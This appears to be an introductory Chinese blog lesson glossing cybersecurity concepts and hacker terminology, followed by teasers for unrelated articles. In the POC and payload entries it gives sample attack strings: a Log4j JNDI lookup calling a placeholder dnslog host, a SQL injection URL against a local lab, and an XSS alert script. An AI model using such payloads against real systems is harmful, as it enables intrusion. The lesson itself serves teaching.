Day1--什么是网络安全?网络安全常用术语

目录

1. 什么是网络安全?

信息系统(Information System)

信息系统安全三要素(CIA)

网络空间安全管理流程

网络安全管理

2. 网络安全的常用术语

3. 网络安全形势

4. 中国网络安全产业现状


1. 什么是网络安全?

        网络空间安全包括了国家安全、城市安全、经济安全、社会安全、生产安全、人身安全等在内的“大安全”。

信息系统(Information System)

        是由计算机硬件网络通信设备计算机软件信息资源信息用户规章制度组成的以处理信息流为目的的人机一体化系统。

信息系统安全三要素(CIA)

  • 保密性(Confidentiality)
  • 完整性(Integrity)
  • 可用性(Availability)

网络空间安全管理流程

  1. 确定网络信息安全管理对象
  2. 评估网络信息安全管理对象的价值
  3. 识别网络信息安全管理对象的威胁
  4. 识别网络信息安全管理对象的脆弱性
  5. 确定网络信息安全管理对象的风险级别
  6. 制定网络信息安全防范体系及防范措施实施和落实网络信息安全防范措施
  7. 运行/维护网络信息安全设备、配置

网络安全管理

  • 《中华人民共和国网络安全法》
  • 《Cybersecurity Law of the People's Republic of China》

2. 网络安全的常用术语

黑客(hacker)对计算机技术非常擅长的人,窃取数据、破坏计算机系统。
脚本小子刚刚入门安全行业,学习了一些技术,只会用现成的工具或者从网上复制代码。
白帽子

· 白帽子的目的是发现企业的漏洞并且上报给企业,帮助其解决风险问题。

· 360补天、漏洞盒子、CNVD、CNNVD

红帽黑客有正义感、爱国的黑客。利用技术维护国家网络安全,并且对外来的攻击进行反击。

漏洞(vulnerability)

· 漏洞指的是硬件、软件协议等等存在的安全缺陷

· https://www.cnnvd.org.cn/web/wz/bzxqByld.tag?id=3&mkid=3

POC

· Proof of Concept

· 能证明漏洞存在的代码

· 例:${jndi:ldap://xxxxxx.dnslog.cn/test}

EXP

· Exploit--利用

· 执行了这一段利用代码之后,就能够达到攻击的目的。

Payload(攻击载荷)

· SQL注入--http://localhost/sqli-labs/Less-3/?id=-1')union select 1.l.database()--+

· XSS--<script>alert(1)</script>

· log4j--${jndi:ldap://xxxxxx.dnslog.cn/test}

0day漏洞已经被发现了(还没有公开),官方还没有发布补丁或者修复方法的漏洞。【危害力很大】
1day

漏洞的POC和EXP已经被公开了,但是很多人还来不及修复这个叫做1day漏洞。 

Nday漏洞

指已经发布官方补丁的漏洞,并且时间已经过去很久的漏洞。

漏扫基于数据库对漏洞进行自动化扫描。
补丁(patch)漏洞的修复程序。
渗透(penetration)

黑客入侵了网站或者计算机系统,获取控制计算机权限的过程。

渗透测试

(penetration test)

用黑客入侵的方式对系统进行安全测试,目的是找出和修复安全漏洞,在这个过程中不会影响系统的正常运行,也不会破坏数据。

木马

(Trojan horse)

隐藏在计算机中的恶意程序。
病毒(Virus)恶意代码程序。
杀毒软件瑞星、江民、金山、国外的诺顿、卡巴斯基、McAfee、360
免杀绕过杀毒软件。
肉鸡已经被黑客获得的控制权限的机器,可能是个人电脑也可能是企业或者单位的服务器,通常情况下因为使用者不知道已经被入侵,所以黑客可以长期获得权限和控制。
抓鸡利用出现概率非常高的漏洞(比如log4j、永恒之蓝),使用自动化方式获取肉鸡的行为。
跳板机黑客为了防止被追溯和识别身份,一般不会用自己的电脑发起攻击,而是利用获取到的肉鸡来攻击其他目标,这个肉鸡就充当一个跳板的角色。
DDos

· Distributed Denial of Service

· 分布式拒绝服务攻击

· 发起大量恶意请求,导致正常用户无法访问。

后门(backdoor)黑客为了对主机进行长期的控制,在机器上种植一段程序或留下一个“入口”。

中间人攻击(MITM)

· Man-in-the-Middle Attack

· MITM攻击

· 运行中间服务器,拦截并篡改数据

网络钓鱼

钓鱼网站指的是冒充的网站,用来窃取用户的账号密码。
webshell

· shell是一种命令执行工具,可以对计算机进行控制。

· webshell就是asp、php、jsp之外的web代码文件,通过这些代码文件可以执行任意的命令,对计算机做任意的操作。

Getshell

· 获得命令执行环境的操作。

· Redis的持久化功能、MySQL的写文件功能,MySQL的日志记录功能、上传功能、数据备份功能、编辑器。

提权(Privilege Escalation)

· 权限提升

· 普通用户权限,把自己提升为管理员权限的擦欧总就叫做提权。

拿站指得到一个网站的最高权限,即得到后台和管理员名字和密码。
拖库(脱裤)托库指的是网站被入侵以后,黑客把全部的数据都导出,窃取到了数据文件。
撞库用获得的裤子去批量登录其他网站。
旁站入侵

入侵服务器的其他网站。

横向移动攻击者入侵一台服务器成功以后,基于内部网络,继续入侵同网段的其他机器。
代理(Proxy)帮我们发起网络请求的一台服务器。
VPN

· Virtual Peivate Network

· 代理

· 加密通信

· 办公--在家里连接到公司内网

蜜罐(Honeypot)吸引攻击者攻击的伪装系统,用来实现溯源和反制。
沙箱(Sandbox)

· 沙箱是一种按照安全策略限制程序行为的执行环境,就算又恶意代码,也只能影响沙箱环境而不会影响到操作系统。 (360安全浏览器--带沙箱功能)

· 微步在线云沙箱:https://s.threatbook.com/

靶场

· 模拟的有漏洞的环境

· 可以是网站、容器、操作系统

堡垒机

· 跳板机--jumpserver

· 运维审计系统--管理资源,审批、审计、访问控制、事件记录

WAF

· Web Application Firewall

· Web应用防火墙。

· 对HTTP/HTTPS的流量内容进行分析,拦截恶意攻击行为。

· WAF使用场景:例如服务器中有些安全性比较差的应用程序,审计和修改全部代码比较麻烦,这时候最好的办法就似乎通过部署WAF来实现安全防护。

· WAF可以防护的常见风险包括:SQL注入、XSS、利用本地/远程文件包含漏洞进行攻击、PHP代码注入、黑客扫描网站,源代码/错误信息泄露等等。

APT攻击

· Advanced Persistent Threat

· 高级可持续威胁攻击,指某组织在网络上对特定对象展开的持续有效的攻击活动。

· 2021深信服APT攻防趋势半年洞察。

护网国家组织牵头组织事业单位,国企单位,名企单位等开展攻防两方的网络安全演习。
CTF

CVE

· Common Vulnerabilities and Exposures--通用漏洞披露

· Mitre

· 例如:CVE-2021-4422/

· CVE Website

CNVD

· 国家信息安全漏洞共享平台--https://www.cnvd.org.cn/

· 国家计算机应激响应中心  CNCERT维护--国家互联网应急中心

 应急响应一个公司为了应对各种安全时间所做的准备和事后采取的措施。

SRC

· Security Response Center---企业的应急响应中心

· SRCs|安全应急响应中心 - 0xsafe

公益SRC

· 漏洞盒子 - 中国领先的漏洞平台与白帽社区|安全众测与安全运营服务平台

· 教育漏洞报告平台(EDUSRC)

网络空间测绘

· 网络空间资源收录

ATT&CK

· 风险分析模型--收集威胁情报,模拟APT攻击

逆向(Reverse)· 把程序还原为源代码,分析程序的运行过程
DevOps

· Development +Operations--安全开发与运维

· 开发测试运维一体化

CICD
等保

· 网络安全等级保护

· 要求相关行业单位和公司的信息系统必须进行定级,然后再公安机关备案,然后建设整改,然后由测评机构评级,并且持续维护和监督。

3. 网络安全形势

        FireEye网络威胁地图:

                https://www.fireeye.com/cyber-map/threat-map.html

        卡巴斯基实时威胁地图:

                地图 | 卡巴斯基网络威胁实时地图

        安全事件分类:GBZ20986-2007《信息安全技术 信息安全事件分类分级指南》

4. 中国网络安全产业现状

        安全产业:
                中国网络安全行业全景图(2020年3月第七版).pdf

                CCSIP 2021中国网络安全产业全景图第三版final.pdf

                2021年网络安全产业分析报告V1.020211011
                

                2021年网络安全产业态势总结

                        https://www.secrss.com/articles/38043

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.mzph.cn/web/3063.shtml

如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈email:809451989@qq.com,一经查实,立即删除!

相关文章

Java Math函数之算术运算宝典:探索数字世界的基石

1. 概述 在Java中&#xff0c;Math类提供了丰富的静态方法用于执行基本算术运算。这些方法使得开发者能够轻松地进行加法、减法、乘法、除法等基本的数学运算&#xff0c;无需自己编写复杂的算法。Math类中的算术运算方法不仅支持整数运算&#xff0c;还支持浮点数运算&#x…

wps/word中字体安装教程

问题&#xff1a;下载的字体怎么导入wps/word wps或word中没有相应字体&#xff0c;怎么导入。其实方法很简单。 Step 1&#xff1a;下载字体 首先&#xff0c;在网上搜索自己喜欢的字体&#xff0c;然后下载到本地。字体的格式通常是.ttf 下面是我网上找的字体&#xff08…

Tips:对于树模型,新增了一个feature,metric提升了不少,但是该feature的特征重要性不高,如何解释这种现象?

在树模型中&#xff0c;新增一个特征后&#xff0c;模型性能&#xff08;如metric&#xff09;显著提升&#xff0c;但该特征在特征重要性排序中并不靠前&#xff0c;这种现象可以从以下几个方面进行解释&#xff1a; 特征交互作用&#xff1a; 树模型能够捕捉到特征间的复杂非…

dat.GUI如何使用和常用方法

什么是dat.GUI&#xff1f; dat.GUI是一个轻量级的用户界面库&#xff0c;用于在Web应用程序中创建可交互的控件。它由Google数据艺术家工作室&#xff08;Google Data Arts Team&#xff09;开发&#xff0c;旨在简化数据可视化和实验性界面的开发过程。dat.GUI提供了一组简单…

Python编程的面向对象(二)—类的多态

Python编程的面向对象(二)—类的多态 在面向对象编程中&#xff0c;多态是一种重要的概念&#xff0c;指的是不同类的对象可以对相同的消息作出响应&#xff0c;表现出不同的行为。多态允许使用基类的引用来调用派生类的方法&#xff0c;实现了接口的统一。 多态的特点&#…

CAPL学习之路-TLS函数

The Transport Layer Security (TLS) Protocol,传输层安全协议。通常是基于TCP传输协议基础上的安全认证协议,不用在UDP上。 为什么TLS不用在UDP协议上? UDP本身就不是一个可靠的协议,你在一个不可靠的协议上进行安全认证,就像是没打地基就想确保房子坚固,这可能吗? 常…

【Camera KMD ISP SubSystem笔记】CAM SYNC与DRQ①

在android系统中fence用于不同模块需要访问同一块buffer的同步&#xff0c;例如camera和graphic。对于preview buffer, camera是生产者graphic是消费者。 camera需要生产图像数据到preview buffer时需要等待preview buffer的 fence可用。 camera sync是高通camx框架里面用于各个…

C/C++常用开源库总结

文章目录 库名主要功能和组件语言miniftpd研究简单的ftp服务器Cmuduo的研究目录记录学习muduo库的一些笔记Cyaziyazi封装的json解析库、ini解析库、xml解析库、简单的基于TCP的多线程服务器–ZeroMQ––Abseil字符串操作: Abseil 提供了一套强大而灵活的字符串处理工具&#xf…

ROS Node

ROS Node ROS&#xff08;Robot Operating System&#xff09;节点是指在ROS中运行的基本单元&#xff0c;它们是一个独立的进程&#xff0c;执行特定的任务&#xff0c;并与其他节点进行通信以完成更复杂的功能。ROS节点是ROS中实现模块化、分布式和可扩展性的关键组件之一。…

【LeetCode】191. 位1的个数

题目链接&#xff1a;191. 位1的个数 题目描述&#xff1a; 解法1&#xff1a;题意很简单就不说了&#xff0c;这里先说一种最简单的解法&#xff0c;首先我们知道一点&#xff1a;n&(n-1)相当于把是将n的二进制位中最低位的1变为了0&#xff0c;其它位保持不变&#xff0…

强制内容在一行显示

强制内容在一行显示 .one {white-space: nowrap;overflow: hidden;text-overflow: ellipsis; /* 可选&#xff0c;当内容超出一行时&#xff0c;用省略号表示 */ }效果

【机器学习】概率模型在机器学习中的应用:以朴素贝叶斯分类去为例

概率模型在机器学习中的应用&#xff1a;以朴素贝叶斯分类器为例 一、概率模型的基本原理二、朴素贝叶斯分类器的原理与实现三、朴素贝叶斯分类器的应用与挑战四、结论与展望 在大数据与人工智能时代&#xff0c;概率模型在各个领域发挥着至关重要的作用。概率模型以概率论和统…

基于STM32F4系列的ETH IAP在线升级程序

目录 1、前言 2、以太网的移植&#xff08;无操作系统&#xff09; 3、移植FATS 系统 4、移植ETH 驱动及 DP83848驱动 5、Tftp 服务程序 6、注意事项 ​7、代码 资料下载地址&#xff1a;基于STM32F4系列的ETH IAP在线升级程序 1、前言 此bootloader程序可以通过http…

网络爬虫之HTTP原理

** URI和URL URI的全称Uniform Resource Identifier &#xff0c;即统一资源标志符。URL的全称Uniform Resource Locator 即统一资源定位符。 URL是URI的子集&#xff0c;也就是每一个URL就是URI&#xff0c;但是每一个URI不一定是URL&#xff0c;URI还有一个子类叫URN&#x…

从零开始写 Docker(十二)---实现 mydocker stop 停止容器

本文为从零开始写 Docker 系列第十二篇&#xff0c;实现类似 docker stop 的功能&#xff0c;使得我们能够停止指定容器。 完整代码见&#xff1a;https://github.com/lixd/mydocker 欢迎 Star 推荐阅读以下文章对 docker 基本实现有一个大致认识&#xff1a; 核心原理&#x…

[韭]第一次参加护网行动要注意什么??

前言 为什么要写这篇文章呢&#xff0c;一是对当下安全环境进行一个分析&#xff0c;二是以过来人的身份留下一点经验。 当下安全环境分析 现在这个时代&#xff0c;大家都已经踏上了信息高速公路&#xff0c;可以自己拿搜索引擎搜一下自己知道的大厂裁员情况&#xff0c;有…

油猴脚本:bing 搜索结果居中

文章目录 效果预览脚本使用步骤安装油猴脚本添加脚本 效果预览 脚本 // UserScript // name bing居中 // namespace http://tampermonkey.net/ // version 2024-04-24 // description try to take over the world! // author You // match http…

rust 卸载重新安装 安装

原因&#xff1a;接触区块链时报错 linking with x86_64-w64-mingw32-gcc failed: exit code: 1 Rust编译需要C环境&#xff0c;如果你没有&#xff0c;Rust也能安装成功&#xff0c;只是无法编译代码 C的编译工具有两个&#xff0c;一个是msvc&#xff0c;也就是visual studi…

CTFshow-PWN-栈溢出(pwn44)

64位的 system(); 但是好像没"/bin/sh" 上面的办法不行了&#xff0c;想想办法 检查&#xff1a; 是 64 位程序 ida 反编译 main 函数&#xff1a; 跟进 ctfshow 函数&#xff1a; 存在栈溢出 offset&#xff1a;0xAh8 在前面经验的基础上&#xff0c;这里我们直…

Python-VBA函数之旅-issubclass函数

目录 一、issubclass函数的常见应用场景&#xff1a; 二、issubclass函数使用注意事项&#xff1a; 三、如何用好issubclass函数&#xff1f; 1、issubclass函数&#xff1a; 1-1、Python&#xff1a; 1-2、VBA&#xff1a; 2、推荐阅读&#xff1a; 个人主页&#xff…